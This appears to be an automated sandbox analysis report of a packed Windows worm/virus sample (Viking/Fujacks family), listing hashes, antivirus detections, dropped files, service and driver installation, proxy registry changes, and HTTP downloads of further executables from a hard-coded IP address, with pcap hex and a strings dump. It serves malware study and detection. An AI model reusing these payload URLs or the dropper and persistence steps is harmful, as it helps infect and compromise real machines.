Analysis Date: 2015-01-28 07:39:36
MD5: 01af29910b1198aa9e5acf8b174a3230
SHA1: 882d06ae9e9d3a74453b7b15f6e6c800d85d4d7c

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section UPX0 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section UPX1 md5: 9c149867937ad06ee54360cb6463f6ea sha1: 3ad3e2bce59c3bf0fade199e97e50181753514cf size: 41472
Section .rsrc md5: 19e155042fc0b9835d15338973193df9 sha1: 57ddca84449c0c1390fb4c396957cc297dee7b8f size: 7168
Section .tc md5: cd67b588714b840e2f9f5976d2a8d35b sha1: abd674d9a156ccc10b52f8c00571bdbcc8862e2a size: 26624
Timestamp: 2002-12-18 15:52:40
PEhash: a31648224bc77e5462e25e68b81840de01c7ec5b
IMPhash: 8b21ff8a0d0059e9d67b568f049de051
AV 360 Safe: Virus.Win32.Agent.O
AV Ad-Aware: Win32.Viking.AR
AV Alwil (avast): Viking-CF:Win32:Viking-CF
AV Arcabit (arcavir): Win32.Viking.AR
AV Authentium: W32/Risk.UKXW-3317
AV Avira (antivir): W32/Fujacks.DR
AV BullGuard: Win32.Viking.AR
AV CA (E-Trust Ino): Win32/Viking.D
AV CAT (quickheal): W32.Agent.DP
AV ClamAV: Worm.Fujack-55
AV Dr. Web: Win32.HLLW.Autoruner.8224
AV Emsisoft: Win32.Viking.AR
AV Eset (nod32): Win32/Agent.DP virus
AV Fortinet: W32/Fujacks.BF!tr
AV Frisk (f-prot): W32/MalwareS.HIF
AV F-Secure: Win32.Viking.AR
AV Grisoft (avg): Win32/Fujacks.S
AV Ikarus: Trojan-Downloader.Win32.Jadtre
AV K7: Virus ( 00108a531 )
AV Kaspersky: Virus.Win32.Agent.dp
AV MalwareBytes: no_virus
AV Mcafee: W32/Fujacks.ay
AV Microsoft Security Essentials: Error Scanning File
AV MicroWorld (escan): Win32.Viking.AR
AV Rising: Win32.Agent.hn
AV Sophos: W32/FuzVir-A
AV Symantec: W32.Loorp.A!inf
AV Trend Micro: PE_JEEFO.D
AV VirusBlokAda (vba32): Virus.Win32.Koklek

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"

Creates File: C:\WINDOWS\system32\dllcache\lsasvc.dll
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Creates File: PIPE\SfcApi
Creates File: PIPE\wkssvc
Creates File: C:\WINDOWS\system32\qmgr.dll
Creates File: C:\WINDOWS\system32\mspmsnsv.dll
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Creates Process: "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"
Starts Service: WmdmPmSN

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 804

Process
↳ Pid 852

Process
↳ C:\WINDOWS\System32\svchost.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Start ➝
2
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates File: NtHid
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates File: C:\Documents and Settings\NetworkService\Cookies\index.dat
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\HRSBU4WO\desktop.ini
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\HMZ5046A\desktop.ini
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\WINDOWS\TEMP\NtHid.sys
Creates File: C:\WINDOWS\system32\WBEM\Logs\wbemess.log
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\6JGTYZAJ\desktop.ini
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\25VLYEY8\desktop.ini
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes File: C:\WINDOWS\TEMP\NtHid.sys
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Creates Mutex: c:!documents and settings!networkservice!local settings!history!history.ie5!
Creates Mutex: c:!documents and settings!networkservice!cookies!
Creates Mutex: c:!documents and settings!networkservice!local settings!temporary internet files!content.ie5!
Creates Service: NtHid - C:\WINDOWS\TEMP\NtHid.sys
Winsock DNS: 204.11.56.45
Winsock DNS: www.490a-B8B5-9B8C1E870B0C.com
Winsock DNS: www.baidu.com
Winsock DNS: pc1.114central.com

Process
↳ Pid 1208

Process
↳ C:\WINDOWS\system32\spoolsv.exe

Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝
NULL
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝
7
Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝
NULL
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝
C:\WINDOWS\System32\spool\PRINTERS\\x00
Creates File: WMIDataDevice

Process
↳ Pid 1864

Process
↳ Pid 1140

Network Details:

DNS: www.a.shifen.com
Type: A
180.76.3.151
DNS: pc1.114central.com
Type: A
204.11.56.45
DNS: nbtj.114anhui.com
Type: A
DNS: www.baidu.com
Type: A
DNS: www.490a-B8B5-9B8C1E870B0C.com
Type: A
HTTP GET: http://204.11.56.45/ko/01.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://204.11.56.45/ko/02.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://204.11.56.45/ko/03.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1033 ➝ 204.11.56.45:80
Flows TCP: 192.168.1.1:1034 ➝ 204.11.56.45:80
Flows TCP: 192.168.1.1:1035 ➝ 204.11.56.45:80

Raw Pcap
0x00000000 (00000)   47455420 2f6b6f2f 30312e65 78652048   GET /ko/01.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20323034 2e31312e 35362e34   ost: 204.11.56.4
0x00000090 (00144)   350d0a43 6f6e6e65 6374696f 6e3a204b   5..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a         eep-Alive....

0x00000000 (00000)   47455420 2f6b6f2f 30322e65 78652048   GET /ko/02.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20323034 2e31312e 35362e34   ost: 204.11.56.4
0x00000090 (00144)   350d0a43 6f6e6e65 6374696f 6e3a204b   5..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a         eep-Alive....

0x00000000 (00000)   47455420 2f6b6f2f 30332e65 78652048   GET /ko/03.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20323034 2e31312e 35362e34   ost: 204.11.56.4
0x00000090 (00144)   350d0a43 6f6e6e65 6374696f 6e3a204b   5..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a         eep-Alive....


Strings
TE..
...
DVCLAL
FILE
GETPASSWORD1
LICENSEDLG	RENAMEDLG
REPLACEFILEDLG
STARTDLG
						
							
														
																												
 0+020e0k0
0,0A0^0s0
08101BB
0j/0@0E0R0f0
0Sx[e0,H
0T0X0\0`0d0h0l0p0t0x0|
1=>=F=
:1G1P1]1
1K1Z1h1
?%?2?]?
2(2B2N2W2c2n
2<2Q{h2p2
2?3H3Q
2D2J2O2U2b1n2t2
>2>E>S>\>s>
2K2f2v2
2P'N.:
2T2d2{2
3$30l3Xk
343=3B3j3p3|3
*37}Cg
;3D;H;L
@3T3e3
4`@,1 L
4&414]4
4%4+4G4
490a-B8B5-9
49-E88E-4c47-98DC
4aaf-A336-C255
4bXND4'R
;4@LXd,
4MXdp|
4Q5e5x
5!6&6/6
)56Ab5t5
;!;+;5;?;C;J;
:5:F:Y:w:|:
%'5k#C
&5Ond|
6.6:6C6M6W6\6
6<6]6i6
6!71767D7R7^7i7p7
}68:&nbsp;
68wW(4
[6\MBros
!(6u_x
7.{645FF040
7FC663
7@ip:K
?7N7T7]
8-00AA
@.&'85
>!>*>8>B>H>V>`>
*8xCkr
9*:/$:
954E}K
^9>(5se9
@\96DBA2^
9 9[9`9g9m9s9~9
9&9/9>9Q9e
-9;9A9F9
9ao^@q
9I?EMF
9.:U:p:}:
9uSI)^
A4J4Y4_4
 A(!4M
A67-586
aDDINA
ADVAPI32.dll
ADVAPI32.DLL
AE4C57'
agX \s
a Play
appmgmts.dlld
ArT?`cvp
ASSWORD1
"bd	WVS
bgTLOkN
browser
C1E870B0C
CancelConne
 cannot be run i
CloseHandle
>COMC6
COMCTL32.DLL
Copyro
CPInfo
CP<Z<|<
CreateFileA
CreateProcessA
crypt'c
D[>*;-
D0H0L0PM
D9mD:kD=iD>
DA-6D69-472e-8981-DBC71
Ddk h$
D*{D-yD.wD1
default
DeleteObject
(D/fc_oL
DOS mode.
dU5 B~
&=,=D=v=
 E#^@7
E8J8O8[8`8i8o8z8
E9Q	w07
))EE	F
EF+cTi
Envkon
ep1'*"/
eParam$
epaWaOS
equiv="c
Esht*6
e	[vB!
ExecuUA
ExitProcess
Expor.exe
F??3@YAXP
F8|8]_s/D+
f+D?	D
FeLibra
 $(FFFF,048FFFF<@DHFFFFLPTXFFFF\`dhFFFFlptxFFFF|
=fnc\C
FPzHl3
f)S7'u+
)$< G5
GDI32.DLL
GetProcAddress
GetTempPathA
gg=7VP
h1l1.T
h3&nO$g
HAutoComplete
hEU_qO
h:Fr; 
%H.k(ug
'hortc
Hur3'$
I)BCSL
iD&YomH
ifyTrLo
igVCRT
InfGma
ingCompatibil
INNSC">"
IocSymd
i|tlh`
IXR-!m
_;i;z;
j$)ALE
	j	)\L
k29 |l
 -k 4/
!K<a~WU~
kca:\lsa
KERNEL32.DLL
KEveny
KH)LaQ
K]$$nX
kOY)`7
K:\Q.pdb`q
Ks, 4=`I
K <\+w
L5PFHP7b
lA|(S>
lClassN
l!G!`O/f&T?
<:l http-
LoadLibraryA
lp6a J
lstrcatA
{LwL/O,
m1\U\Kcn
 M3PDHL
M4s+/,(4
M8WwuE
M:d:m:
~m E!u)y
MSN Gam
MSVCRT.dll
NAM	%s 
-{nr8 N
ns,res
 NT\Curr
NtQu9y
Number
Nv`mG}
^ny{fY-f
oft\Wud
OLE32.DLL
OleInitialize
o@P3e4
Op-;4$
~OPEN=-
+OpsSCM
|otB.8
,ov\A}
OverwrNk
o #Z	f
PathFileExistsA
penc !
p-p?d/
PV_gp_j7Mx
pVKwOf
P;Z;d;n;x;
q$A3<.
QGKN&,s
qidu.com
Q!k/K3C
QQQQQQQ
qwSKNC
$>)`r!
R:2tZ;
\Ra7207
'RC,@a
 `.rdat[
RECYCLER
RegCloseKey
Remote
REPLACEFIL
_rju@_fd
;RNh8Y
-<RoA%'_h7
RtlIoU
R)ZnX9
S1[1`1m1
s1wEzy
)S37%.-
{schedsvc
S$C v	D
sDirHR7SFX=ln
sdm&TN
SDPSRV
sD'Tim
SetMenu
SHELL32.DLL
SHGetMalloc
SHLWAPI.dll
SHr,gq]
SOFTWARE\Mi
Sp`FFF
S&SCwXn
START7ichEdit]L
sTex T$
StringA
s_/UYY
swsocknetman1ssdp
T)C\71;5
.tcLCI0
+T&$cT0P^
.textVT
_This #g
!This program cannot be run in DOS mode.
This program must be run under Win32
tiI,WideCharR]
T"jllp%+
tl`TDi
tM/hr;
ToFilnH
TPR vc
&trMx_O
tTisrv
t?>[u3
tx3D#+
?%_#txg
-type" 
uD2sD5qD6o{
>"u:F@
U!g@0p<Hk
	U;MhOy
uMpr.{
#upnphostKn&s
URLDown
urruVssion[ogr
USER32.dll
USER32.DLL
v,{= _
V3_3o3x3
V6sion\
v7Os2_qWSArcvF
v|htcL
vieAak:m
VirtualAlloc
VirtualFree
VirtualProtect
V?oh`x6
vThfad
\v:.X$
vY22!g
W0YX0wx
|w9=trW
wapi.dll
\Windows\C
 winsta0
WithTag	
w;LCal
WmdmPmSN'Fa
Wnd[juG
WO$_9E
Writea7
WriteFile
wsprintfA
`wxFD@
w{X*)k
<	=x=}=
/X,.CC
/XfxnamEK
 X -ibcB"
<)<.<X<i<o
xmlpbS
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Roshal.WinRAR.WinRAR" type="win32" /> <description>WinRAR archiver.</description> <dependency> <dependentAssembly> <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /> </dependentAssembly> </dependency> </assembly>
{+xN{?ODBE
^$xnre
XPTPSW
XPVSSG
XRichS
XSHB_ws
xwuLEwE
~X[(WW
XX; tg
/;%y;~;
	(y*]3
.y!GN&
YNANRv
{<:y&q?	
|/Yr3Y
*y/.uzyzuEFz8GD
y%*+vp*vCpuC%
/YW'RB
Z2fQ`d
(ze:12;
@z}]u2o